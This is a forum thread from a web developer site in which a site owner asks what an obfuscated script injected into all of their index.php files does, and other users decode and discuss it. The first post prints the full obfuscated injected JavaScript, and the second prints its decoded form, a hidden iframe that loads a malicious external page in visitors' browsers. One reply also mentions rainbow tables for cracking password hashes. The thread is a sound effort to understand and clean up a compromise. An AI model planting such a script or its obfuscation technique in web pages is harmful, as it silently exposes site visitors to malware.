www.webdeveloper.com
Results 1 to 15 of 15

Thread: index.php hacked

  1. #1
    Join Date
    Aug 2011
    Posts
    3

    index.php hacked

    hi guys,

    my server was attaced some days ago, and to all "index.php" files the following code was added:


    Code:
        <script>String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('a'+'s'))throw 1;}catch(q){h=-1*(d-d2);}
        n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,39-h,121-h,7-h,7-h,7-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,57-h,7-h,7-h,123-h,30-h,99-h,106-h,113-h,99-h,30-h,121-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,117-h,112-h,103-h,114-h,99-h,38-h,32-h,58-h,103-h,100-h,112-h,95-h,107-h,99-h,30-h,113-h,112-h,97-h,59-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,110-h,109-h,115-h,120-h,116-h,114-h,108-h,102-h,44-h,97-h,120-h,44-h,97-h,97-h,45-h,97-h,109-h,115-h,108-h,114-h,47-h,52-h,44-h,110-h,102-h,110-h,37-h,30-h,117-h,103-h,98-h,114-h,102-h,59-h,37-h,47-h,46-h,37-h,30-h,102-h,99-h,103-h,101-h,102-h,114-h,59-h,37-h,47-h,46-h,37-h,30-h,113-h,114-h,119-h,106-h,99-h,59-h,37-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,56-h,102-h,103-h,98-h,98-h,99-h,108-h,57-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,56-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,57-h,106-h,99-h,100-h,114-h,56-h,46-h,57-h,114-h,109-h,110-h,56-h,46-h,57-h,37-h,60-h,58-h,45-h,103-h,100-h,112-h,95-h,107-h,99-h,60-h,32-h,39-h,57-h,7-h,7-h,123-h,7-h,7-h,100-h,115-h,108-h,97-h,114-h,103-h,109-h,108-h,30-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,121-h,7-h,7-h,7-h,116-h,95-h,112-h,30-h,100-h,30-h,59-h,30-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,97-h,112-h,99-h,95-h,114-h,99-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,38-h,37-h,103-h,100-h,112-h,95-h,107-h,99-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,113-h,112-h,97-h,37-h,42-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,110-h,109-h,115-h,120-h,116-h,114-h,108-h,102-h,44-h,97-h,120-h,44-h,97-h,97-h,45-h,97-h,109-h,115-h,108-h,114-h,47-h,52-h,44-h,110-h,102-h,110-h,37-h,39-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,59-h,37-h,102-h,103-h,98-h,98-h,99-h,108-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,59-h,37-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,106-h,99-h,100-h,114-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,114-h,109-h,110-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,117-h,103-h,98-h,114-h,102-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);</script>
    Well. i think it's java script, and now i want to know WHAT this code is / was doing a) at my server b) in the browser of my visitors

    thanks!

    ps: as you've might have realized, english is not my mother tongue ...

  2. #2
    Join Date
    Apr 2006
    Location
    Perth
    Posts
    154
    decoded:

    Code:
    if (document.getElementsByTagName('body')[0])
     { iframer(); }
    else
     { document.write("&lt;iframe src='http://pouzvtnh.cz.cc/count16.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'&gt;&lt;/iframe&gt;");
     }
    function iframer()
     { var f = document.createElement('iframe');
       f.setAttribute('src','http://pouzvtnh.cz.cc/count16.php');
       f.style.visibility='hidden';
       f.style.position='absolute';
       f.style.left='0';
       f.style.top='0';
       f.setAttribute('width','10');
       f.setAttribute('height','10');
       document.getElementsByTagName('body')[0].appendChild(f);
     }
    edit: wow, Do Not load that pouzvth.cz.cc site. Will redirect you somewhere else
    and even though I only downloaded the source in raw unexecutable text, AVG picked
    it up. So it's a known threat.
    Last edited by DracoMerest; 08-28-2011 at 11:09 AM. Reason: additonal info

  3. #3
    Join Date
    Aug 2011
    Posts
    3
    do you ahve an idea, how it came to my webspace? i'm only using linux systems - no windows!

  4. #4
    Join Date
    Apr 2006
    Location
    Perth
    Posts
    154
    Best guess: someone figured out your linux password? I do not know how you access
    your server remotely but obviously someone does.

    Hacking is a tricky thing - sometimes the easiest method is the least obvious.

    If you have a simple password and I can sniff out your password hash database (I don't
    know what it is called really) and extracted the MD5 hash or which ever, I could either
    brute force your password or use a rainbow table.

  5. #5
    Join Date
    Aug 2011
    Posts
    3
    okay, i've changed all my passwords now - hopfully i wount forget them... (by the way i used a live disk that could not be infected by a rootkit, i think).

    i'm going to contact my hoster too. hopefully he might help me...

    okay, thanks for your great help, now i know, whats my problem.

  6. #6
    Join Date
    Apr 2006
    Location
    Perth
    Posts
    154
    Passwords may not have been your only problem area.

    You have no indicated what is on your site.

    If you allow visitors to post information through a shoutbox or mini forum then there is
    always the possibility that someone was able to bypass any active content filters and
    inject some malicious code which actively modified the files on your sever.

    Having changed one security aspect: you password, wait. If it happens again look for a
    solution elsewhere. Always make one change and test the result.

  7. #7
    Join Date
    Aug 2011
    Posts
    60
    all page data should come thrue the index and the top of each file should be conditioned on being accessed by the index }else{ exit; } or kill;
    the index should never be writable perm-0555, and sql is the worst idea for passwords. flatfile above the web-root instead.
    after all, sql is simply a flatfile organizer.

  8. #8
    Join Date
    Jan 2009
    Posts
    3,346
    Quote Originally Posted by Dorky View Post
    all page data should come thrue the index and the top of each file should be conditioned on being accessed by the index }else{ exit; } or kill;
    the index should never be writable perm-0555, and sql is the worst idea for passwords. flatfile above the web-root instead.
    after all, sql is simply a flatfile organizer.
    SQL is fine for passwords as long as a good hash with a salt is used. If the OP is on a shared host it might've been another poor consumer who was initially hacked in which case there really might not have been anything the OP could have done.

  9. #9
    Join Date
    Aug 2011
    Posts
    60
    Quote Originally Posted by criterion9 View Post
    SQL is fine for passwords as long as a good hash with a salt is used. If the OP is on a shared host it might've been another poor consumer who was initially hacked in which case there really might not have been anything the OP could have done.
    Word

  10. #10
    Join Date
    Oct 2011
    Posts
    2
    Hi,

    DracoMerest, you'd know where I could tell me decode this kind of code or that code is, that base64 is not a site where encode / decode or some script that allows me to do this kind of coding.

    Sorry for my bad English

    Thanks a lot.

  11. #11
    Join Date
    Apr 2006
    Location
    Perth
    Posts
    154
    Hi Drotha,

    Your English is not that bad but your description of what you want is terrible.

    The only thing I can really identify from your request is base64 and de/encode.

    Do you have MIME64 text you wish to decode?

    http://www.webutils.pl/Base64

    This type of text is usually found as a BIN attachment for newsgroups.

    Are you referring to MD5 or NT/LM hashcodes?

    RunScanner is very good.
    RaibowTables.com will get many jobs done.

    That is all I can offer at the moment due to not fully understanding your question.

  12. #12
    Join Date
    Apr 2011
    Location
    Accelerating Windows at 9.81 m/s....
    Posts
    33
    Most of these attacks (in the wild) are SQL-injections. Always sanitize your inputs. If you're running someone else's code, upgrade to the latest version. And complain to them rather loudly

  13. #13
    Join Date
    Oct 2011
    Posts
    2
    Hi DracoMerest,

    I wish I could de/encode this type of code
    7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,... in the first post you put and him decode, not is base64 coded or no I decoded

    as de/encode?


    Thanks a lot

  14. #14
    Join Date
    Apr 2006
    Location
    Perth
    Posts
    154
    Hi Dortha,

    I do not have an encoder.

    The decoder is in the script posted by go-seven. I merely asked the decoder
    to show the result instead of executing it.

    for(i=0;i<n.length;i++)
    ss+=s(eval("n"+"["+"i"+"]"));
    // eval(ss);
    document.write("<xmp>"+ss+"</xmp>");

    Search Google for 'encrypt JavaScript' and you'll find many results. but most
    of them are useless because the decode script must be included within any
    webpage that uses the encryption.

    Did you read the Sticky Note "Wondering how to hide your source code?"

    Note: I am very sad to see the <XMP> tag not being part of HTML5...

  15. #15
    Join Date
    Jan 2013
    Location
    Jamaica
    Posts
    1
    Quote Originally Posted by DracoMerest View Post
    Passwords may not have been your only problem area.

    You have no indicated what is on your site.

    If you allow visitors to post information through a shoutbox or mini forum then there is
    always the possibility that someone was able to bypass any active content filters and
    inject some malicious code which actively modified the files on your sever.

    Having changed one security aspect: you password, wait. If it happens again look for a
    solution elsewhere. Always make one change and test the result.
    I was planning to add a shoutbox to my site, and seeing this post, im now pondering if it is safe to add the shoutbox.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
HTML5 Development Center



Recent Articles